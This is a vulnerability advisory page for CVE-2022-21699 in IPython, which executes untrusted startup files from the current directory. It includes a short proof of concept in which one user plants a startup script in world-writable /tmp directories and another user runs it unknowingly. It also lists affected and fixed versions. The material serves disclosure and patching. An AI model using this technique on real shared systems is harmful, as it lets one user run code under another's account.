Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1wcTdtLTNndzctZ3E1eM0kfg
Execution with Unnecessary Privileges in ipython
We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
Proof of concept
User1:
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
User2:
cd /tmp
ipython
User2 will see:
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
Patched release and documentation
See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,
Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcTdtLTNndzctZ3E1eM0kfg
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 2 years ago
Updated: about 1 year ago
CVSS Score: 8.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Identifiers: GHSA-pq7m-3gw7-gq5x, CVE-2022-21699
References:
- https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x
- https://github.com/ipython/ipython/commit/46a51ed69cdf41b4333943d9ceeb945c4ede5668
- https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699
- https://nvd.nist.gov/vuln/detail/CVE-2022-21699
- https://lists.debian.org/debian-lts-announce/2022/01/msg00021.html
- https://lists.fedoraproject.org/archives/list/[email protected]/message/CRQRTWHYXMLDJ572VGVUZMUPEOTPM3KB/
- https://lists.fedoraproject.org/archives/list/[email protected]/message/DZ7LVZBB4D7KVSFNEQUBEHFO3JW6D2ZK/
- https://github.com/advisories/GHSA-pq7m-3gw7-gq5x
Blast Radius: 42.6
Affected Packages
pypi:ipython
Dependent packages: 2,171Dependent repositories: 133,952
Downloads: 43,127,133 last month
Affected Version Ranges: >= 8.0.0, < 8.0.1, >= 7.17.0, < 7.31.1, >= 6.0.0, < 7.16.3, < 5.11
Fixed in: 8.0.1, 7.31.1, 7.16.3, 5.11
All affected versions: 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8, 0.6.9, 0.6.10, 0.6.11, 0.6.12, 0.6.13, 0.6.14, 0.6.15, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.9.1, 0.10.1, 0.10.2, 0.12.1, 0.13.1, 0.13.2, 1.0.0, 1.1.0, 1.2.0, 1.2.1, 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 3.0.0, 3.1.0, 3.2.0, 3.2.1, 3.2.2, 3.2.3, 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.1.0, 4.1.1, 4.1.2, 4.2.0, 4.2.1, 5.0.0, 5.1.0, 5.2.0, 5.2.1, 5.2.2, 5.3.0, 5.4.0, 5.4.1, 5.5.0, 5.6.0, 5.7.0, 5.8.0, 5.9.0, 5.10.0, 6.0.0, 6.1.0, 6.2.0, 6.2.1, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 7.0.0, 7.0.1, 7.1.0, 7.1.1, 7.2.0, 7.3.0, 7.4.0, 7.5.0, 7.6.0, 7.6.1, 7.7.0, 7.8.0, 7.9.0, 7.10.0, 7.10.1, 7.10.2, 7.11.0, 7.11.1, 7.12.0, 7.13.0, 7.14.0, 7.15.0, 7.16.0, 7.16.1, 7.16.2, 7.17.0, 7.18.0, 7.18.1, 7.19.0, 7.20.0, 7.21.0, 7.22.0, 7.23.0, 7.23.1, 7.24.0, 7.24.1, 7.25.0, 7.26.0, 7.27.0, 7.28.0, 7.29.0, 7.30.0, 7.30.1, 7.31.0, 8.0.0
All unaffected versions: 7.16.3, 7.31.1, 7.32.0, 7.33.0, 7.34.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0, 8.4.0, 8.5.0, 8.6.0, 8.7.0, 8.8.0, 8.9.0, 8.10.0, 8.11.0, 8.12.0, 8.12.1, 8.12.2, 8.12.3, 8.13.0, 8.13.1, 8.13.2, 8.14.0, 8.15.0, 8.16.0, 8.16.1, 8.17.0, 8.17.1, 8.17.2, 8.18.0, 8.18.1, 8.19.0, 8.20.0, 8.21.0, 8.22.0, 8.22.1, 8.22.2, 8.23.0